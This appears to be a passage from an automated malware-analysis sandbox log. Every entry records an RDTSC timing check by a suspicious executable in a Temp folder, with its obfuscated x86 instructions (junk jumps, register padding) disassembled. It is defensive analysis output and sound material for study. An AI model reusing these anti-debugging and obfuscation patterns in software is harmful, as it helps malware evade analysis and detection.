Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: 4DB0D38 second address: 4DB0D4B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC4CCEF6ADFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: 4DB0D4B second address: 4DB0D51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: 4DB0D51 second address: 4DB0D55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: 4DB0D55 second address: 4DB0D59 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: 4DB0EF3 second address: 4DB0EF9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: 4DB0EF9 second address: 4DB0EFF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: 4DB0EFF second address: 4DB0F03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: 4DB0F03 second address: 4DB0F29 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC4CC91058Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007FC4CC91058Bh 0x00000011 xchg eax, ebp 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: 4DB0F29 second address: 4DB0F58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FC4CCEF6AE1h 0x0000000a sub eax, 2E6188A6h 0x00000010 jmp 00007FC4CCEF6AE1h 0x00000015 popfd 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: 4DD0DBB second address: 4DD0DD8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, FFC2h 0x00000007 mov ecx, edi 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FC4CC91058Ch 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: 4DD0DD8 second address: 4DD0DDC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: 4DD0DDC second address: 4DD0DE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: 4DD0DE2 second address: 4DD0DE8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: 4DD0DE8 second address: 4DD0DEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: 4DD0DEC second address: 4DD0E07 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebp 0x0000000b pushad 0x0000000c mov edi, ecx 0x0000000e mov dh, ch 0x00000010 popad 0x00000011 mov ebp, esp 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 mov ebx, eax 0x00000018 mov ebx, eax 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: 4DD0E07 second address: 4DD0E1D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop eax 0x00000005 mov ax, di 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov eax, ebx 0x00000011 mov dx, 9A18h 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: 4DD0E1D second address: 4DD0ED7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, 2D73h 0x00000007 jmp 00007FC4CCEF6AE8h 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov dword ptr [esp], ecx 0x00000012 jmp 00007FC4CCEF6AE0h 0x00000017 mov eax, dword ptr [774365FCh] 0x0000001c pushad 0x0000001d pushfd 0x0000001e jmp 00007FC4CCEF6ADEh 0x00000023 jmp 00007FC4CCEF6AE5h 0x00000028 popfd 0x00000029 pushad 0x0000002a mov si, 8EDDh 0x0000002e pushfd 0x0000002f jmp 00007FC4CCEF6ADAh 0x00000034 sbb ax, E938h 0x00000039 jmp 00007FC4CCEF6ADBh 0x0000003e popfd 0x0000003f popad 0x00000040 popad 0x00000041 test eax, eax 0x00000043 jmp 00007FC4CCEF6AE6h 0x00000048 je 00007FC53F4D9584h 0x0000004e push eax 0x0000004f push edx 0x00000050 jmp 00007FC4CCEF6AE7h 0x00000055 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: 4DD0ED7 second address: 4DD0F63 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC4CC91058Fh 0x00000009 or cl, 0000000Eh 0x0000000c jmp 00007FC4CC910599h 0x00000011 popfd 0x00000012 pushfd 0x00000013 jmp 00007FC4CC910590h 0x00000018 and eax, 68E89788h 0x0000001e jmp 00007FC4CC91058Bh 0x00000023 popfd 0x00000024 popad 0x00000025 pop edx 0x00000026 pop eax 0x00000027 mov ecx, eax 0x00000029 pushad 0x0000002a movzx esi, bx 0x0000002d mov si, dx 0x00000030 popad 0x00000031 xor eax, dword ptr [ebp+08h] 0x00000034 jmp 00007FC4CC910598h 0x00000039 and ecx, 1Fh 0x0000003c push eax 0x0000003d push edx 0x0000003e push eax 0x0000003f push edx 0x00000040 jmp 00007FC4CC91058Ah 0x00000045 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: 4DD0F63 second address: 4DD0F72 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC4CCEF6ADBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: 4DD0F72 second address: 4DE0047 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC4CC910599h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 ror eax, cl 0x0000000b jmp 00007FC4CC91058Eh 0x00000010 leave 0x00000011 jmp 00007FC4CC910590h 0x00000016 retn 0004h 0x00000019 nop 0x0000001a mov esi, eax 0x0000001c lea eax, dword ptr [ebp-08h] 0x0000001f xor esi, dword ptr [00BB2014h] 0x00000025 push eax 0x00000026 push eax 0x00000027 push eax 0x00000028 lea eax, dword ptr [ebp-10h] 0x0000002b push eax 0x0000002c call 00007FC4D0B71479h 0x00000031 push FFFFFFFEh 0x00000033 jmp 00007FC4CC910590h 0x00000038 pop eax 0x00000039 jmp 00007FC4CC910590h 0x0000003e ret 0x0000003f nop 0x00000040 push eax 0x00000041 call 00007FC4D0B804BFh 0x00000046 mov edi, edi 0x00000048 jmp 00007FC4CC910590h 0x0000004d xchg eax, ebp 0x0000004e jmp 00007FC4CC910590h 0x00000053 push eax 0x00000054 jmp 00007FC4CC91058Bh 0x00000059 xchg eax, ebp 0x0000005a push eax 0x0000005b push edx 0x0000005c jmp 00007FC4CC910595h 0x00000061 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: 4DE0047 second address: 4DE008F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bl, 53h 0x00000005 pushfd 0x00000006 jmp 00007FC4CCEF6AE8h 0x0000000b or si, EA88h 0x00000010 jmp 00007FC4CCEF6ADBh 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 mov ebp, esp 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007FC4CCEF6AE0h 0x00000024 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: 4DE008F second address: 4DE0093 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: 4DE0093 second address: 4DE0099 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: 4DE0099 second address: 4DE00AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC4CC91058Dh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: 4D90008 second address: 4D9000C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: 4D9000C second address: 4D90010 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: 4D90010 second address: 4D90016 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: 4D90016 second address: 4D90025 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC4CC91058Bh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: 4D90025 second address: 4D900E2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC4CCEF6AE9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007FC4CCEF6ADEh 0x00000011 push eax 0x00000012 jmp 00007FC4CCEF6ADBh 0x00000017 xchg eax, ebp 0x00000018 pushad 0x00000019 push ecx 0x0000001a movsx ebx, ax 0x0000001d pop ecx 0x0000001e call 00007FC4CCEF6ADDh 0x00000023 call 00007FC4CCEF6AE0h 0x00000028 pop eax 0x00000029 pop ebx 0x0000002a popad 0x0000002b mov ebp, esp 0x0000002d pushad 0x0000002e mov dx, ax 0x00000031 call 00007FC4CCEF6AE8h 0x00000036 pushfd 0x00000037 jmp 00007FC4CCEF6AE2h 0x0000003c and ax, 32B8h 0x00000041 jmp 00007FC4CCEF6ADBh 0x00000046 popfd 0x00000047 pop eax 0x00000048 popad 0x00000049 and esp, FFFFFFF8h 0x0000004c push eax 0x0000004d push edx 0x0000004e push eax 0x0000004f push edx 0x00000050 jmp 00007FC4CCEF6AE1h 0x00000055 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: 4D900E2 second address: 4D900F7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC4CC910591h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: 4D900F7 second address: 4D90113 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC4CCEF6AE1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push edi 0x0000000e pop esi 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: 4D90113 second address: 4D90119 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: 4D90119 second address: 4D901E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FC4CCEF6AE9h 0x0000000e xchg eax, ecx 0x0000000f jmp 00007FC4CCEF6ADEh 0x00000014 xchg eax, ebx 0x00000015 pushad 0x00000016 mov ecx, 3705B04Dh 0x0000001b pushad 0x0000001c mov ah, C2h 0x0000001e call 00007FC4CCEF6AE5h 0x00000023 pop esi 0x00000024 popad 0x00000025 popad 0x00000026 push eax 0x00000027 jmp 00007FC4CCEF6ADEh 0x0000002c xchg eax, ebx 0x0000002d pushad 0x0000002e jmp 00007FC4CCEF6ADEh 0x00000033 pushfd 0x00000034 jmp 00007FC4CCEF6AE2h 0x00000039 jmp 00007FC4CCEF6AE5h 0x0000003e popfd 0x0000003f popad 0x00000040 mov ebx, dword ptr [ebp+10h] 0x00000043 jmp 00007FC4CCEF6ADEh 0x00000048 xchg eax, esi 0x00000049 push eax 0x0000004a push edx 0x0000004b jmp 00007FC4CCEF6AE7h 0x00000050 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: 4D901E0 second address: 4D9029A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC4CC910599h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FC4CC910597h 0x00000011 or cx, 24DEh 0x00000016 jmp 00007FC4CC910599h 0x0000001b popfd 0x0000001c mov ecx, 2BEA93A7h 0x00000021 popad 0x00000022 xchg eax, esi 0x00000023 jmp 00007FC4CC91058Ah 0x00000028 mov esi, dword ptr [ebp+08h] 0x0000002b jmp 00007FC4CC910590h 0x00000030 xchg eax, edi 0x00000031 pushad 0x00000032 mov dl, cl 0x00000034 pushfd 0x00000035 jmp 00007FC4CC910593h 0x0000003a adc esi, 66376C4Eh 0x00000040 jmp 00007FC4CC910599h 0x00000045 popfd 0x00000046 popad 0x00000047 push eax 0x00000048 push eax 0x00000049 push edx 0x0000004a push eax 0x0000004b push edx 0x0000004c push eax 0x0000004d push edx 0x0000004e rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: 4D9029A second address: 4D9029E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: 4D9029E second address: 4D902A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: 4D902A2 second address: 4D902A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: 4D902A8 second address: 4D902AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: 4D902AE second address: 4D902D2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC4CCEF6AE7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, edi 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: 4D902D2 second address: 4D902D8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: 4D902D8 second address: 4D902DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: 4D902DE second address: 4D902E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: 4D902E2 second address: 4D90327 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test esi, esi 0x0000000a jmp 00007FC4CCEF6AE0h 0x0000000f je 00007FC53F514DEFh 0x00000015 jmp 00007FC4CCEF6AE0h 0x0000001a cmp dword ptr [esi+08h], DDEEDDEEh 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007FC4CCEF6ADAh 0x0000002a rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: 4D90327 second address: 4D90336 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC4CC91058Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: 4D90336 second address: 4D90368 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC4CCEF6AE9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007FC53F514DAEh 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FC4CCEF6ADDh 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: 4D90368 second address: 4D90410 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, EE42h 0x00000007 pushfd 0x00000008 jmp 00007FC4CC910593h 0x0000000d add ah, 0000003Eh 0x00000010 jmp 00007FC4CC910599h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 mov edx, dword ptr [esi+44h] 0x0000001c jmp 00007FC4CC91058Eh 0x00000021 or edx, dword ptr [ebp+0Ch] 0x00000024 jmp 00007FC4CC910590h 0x00000029 test edx, 61000000h 0x0000002f jmp 00007FC4CC910590h 0x00000034 jne 00007FC53EF2E831h 0x0000003a jmp 00007FC4CC910590h 0x0000003f test byte ptr [esi+48h], 00000001h 0x00000043 push eax 0x00000044 push edx 0x00000045 jmp 00007FC4CC910597h 0x0000004a rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: 4D90410 second address: 4D90416 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: 4D90416 second address: 4D90455 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007FC53EF2E809h 0x0000000e jmp 00007FC4CC910597h 0x00000013 test bl, 00000007h 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FC4CC910595h 0x0000001d rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: 4D80899 second address: 4D8089D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: 4D8089D second address: 4D808B8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC4CC910597h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: 4D808B8 second address: 4D80912 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC4CCEF6AE9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007FC4CCEF6ADEh 0x00000010 and esp, FFFFFFF8h 0x00000013 jmp 00007FC4CCEF6AE0h 0x00000018 xchg eax, ebx 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FC4CCEF6AE7h 0x00000020 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: 4D80912 second address: 4D8092A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC4CC910594h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: 4D8092A second address: 4D8096F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC4CCEF6ADBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d mov esi, ebx 0x0000000f mov di, BED6h 0x00000013 popad 0x00000014 xchg eax, ebx 0x00000015 jmp 00007FC4CCEF6ADDh 0x0000001a xchg eax, esi 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007FC4CCEF6AE8h 0x00000024 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: 4D8096F second address: 4D8097E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC4CC91058Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: 4D8097E second address: 4D80A2C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FC4CCEF6ADFh 0x00000008 pop ecx 0x00000009 call 00007FC4CCEF6AE9h 0x0000000e pop ecx 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 jmp 00007FC4CCEF6ADEh 0x00000018 xchg eax, esi 0x00000019 pushad 0x0000001a mov ecx, 0F5D4E3Dh 0x0000001f mov bh, cl 0x00000021 popad 0x00000022 mov esi, dword ptr [ebp+08h] 0x00000025 jmp 00007FC4CCEF6AE5h 0x0000002a sub ebx, ebx 0x0000002c pushad 0x0000002d pushfd 0x0000002e jmp 00007FC4CCEF6ADDh 0x00000033 or eax, 1787C5B6h 0x00000039 jmp 00007FC4CCEF6AE1h 0x0000003e popfd 0x0000003f mov bx, ax 0x00000042 popad 0x00000043 test esi, esi 0x00000045 jmp 00007FC4CCEF6ADAh 0x0000004a je 00007FC53F51C44Ch 0x00000050 push eax 0x00000051 push edx 0x00000052 push eax 0x00000053 push edx 0x00000054 jmp 00007FC4CCEF6ADAh 0x00000059 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: 4D80A2C second address: 4D80A32 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: 4D80A32 second address: 4D80A76 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC4CCEF6ADEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [esi+08h], DDEEDDEEh 0x00000010 jmp 00007FC4CCEF6AE0h 0x00000015 mov ecx, esi 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FC4CCEF6AE7h 0x0000001e rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: 4D80A76 second address: 4D80AF4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC4CC910599h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007FC53EF35E96h 0x0000000f jmp 00007FC4CC91058Eh 0x00000014 test byte ptr [77436968h], 00000002h 0x0000001b jmp 00007FC4CC910590h 0x00000020 jne 00007FC53EF35E7Eh 0x00000026 pushad 0x00000027 jmp 00007FC4CC91058Eh 0x0000002c movzx esi, bx 0x0000002f popad 0x00000030 mov edx, dword ptr [ebp+0Ch] 0x00000033 push eax 0x00000034 push edx 0x00000035 jmp 00007FC4CC910598h 0x0000003a rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: 4D80AF4 second address: 4D80AFA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: 4D80AFA second address: 4D80AFE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
